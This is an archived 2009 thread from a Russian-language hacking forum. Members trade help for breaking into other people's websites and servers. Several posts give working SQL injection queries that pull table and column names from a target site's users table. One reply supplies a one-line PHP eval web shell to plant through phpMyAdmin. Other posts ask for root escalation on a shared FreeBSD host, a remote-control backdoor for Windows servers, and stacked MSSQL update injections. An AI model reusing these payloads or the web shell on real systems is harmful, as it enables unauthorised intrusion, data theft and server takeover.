ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.10.2009, 22:19
|
|
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983
Репутация:
39
|
|
подскажите...
с помощью скули вида
www.site.com/home.php?fid=8+and+1=2+union+select+1=user(),2,3+--+
выдернул все названия бд,таблиц и столбцов. Теперь хочу узнать столбцы из таблицы users. Узнал тока столбец id.
1) возможно ли узнать как то остальные названия кроме брута (брутить почему-то не получается)
2) кавычки совать нельзя. можно ли в where хешить само условие?
|
|
|
28.10.2009, 22:23
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
union select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1
где 7573657273 users..а вообще читай статьи..это так трудно?
|
|
|
|
28.10.2009, 23:39
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
union select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1
где 7573657273 users..а вообще читай статьи..это так трудно?
или через group_concat() без лимита, правда иногда может невсе вывести если сильно много данных.
|
|
|
|
29.10.2009, 02:50
|
|
Познающий
Регистрация: 08.06.2007
Сообщений: 75
Провел на форуме:
517024
Репутация:
76
|
|
Есть похапе-шелл и возможность компилить локальным юзером на FreeBSD 6.3-RELEASE-p11. На машине еще около двухста юзеров, MySql (5.0.75) и Апач.
Как поднять права до рута? Как можно посмотреть содержимое директорий соседа?
|
|
|
|
29.10.2009, 10:57
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Знаю что не по теме но все таки... Посоветуйте какой нибуть бек дор (системный продукт) для удаленного упр. сервера (предположительно стоит windows 2003/2008)
Главный функционал -> командная строка (телнет чтоли называется) либо отстук куда нибуть (т.е. чтобы зараж. машина брала cmd команды с хоста моего)
Знаю что много щас сущ. продуктов/бек доров но нужен стабильный продукт/бек дор (можно и палевный бек дор)
Последний раз редактировалось wolmer; 29.10.2009 в 11:01..
|
|
|
|
29.10.2009, 11:11
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
А какой он должен быть, если скрипт вообще ничего не выводит?
Это blind. Пустой экран - TRUE , more than 1 row - FALSE
Статью прочти, которую я дал в том посте
|
|
|
|
29.10.2009, 12:21
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Посоветуйте шелл который можно через pma залить,весом до 5кб и работающий magic_quotes_gpc On
|
|
|
|
29.10.2009, 12:50
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
<?php eval(stripslashes($_REQUEST[ev])); ?>
|
|
|
|
29.10.2009, 13:54
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..
|
|
|
|
29.10.2009, 14:04
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от M1ks
есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..
в mysql - нет, если конечно скуля не в запросе "update".
а в mssql теоретически можно так script.php?id=4;update.....
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
